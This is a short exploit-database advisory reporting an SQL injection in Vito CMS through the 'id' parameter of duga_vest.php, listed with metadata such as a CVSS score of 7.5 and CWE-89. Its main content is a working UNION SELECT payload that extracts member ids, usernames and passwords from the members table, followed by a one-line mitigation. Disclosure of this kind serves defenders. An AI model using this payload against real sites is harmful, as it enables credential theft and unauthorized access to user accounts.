vendor:
Vito CMS
by:
hacker@sr.gov.yu
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vito CMS
Affected Version From: ALL
Affected Version To: ALL
Patch Exists: Not available
Related CWE: Not available
CPE: Not available
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows & Linux
Not available
Vito CMS Exploit
It was found that Vito CMS does not validate properly the "id" parameter value. http://server/duga_vest.php?id=1[SQL] http://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members--
Mitigation:
Input validation of "id" parameter should be corrected.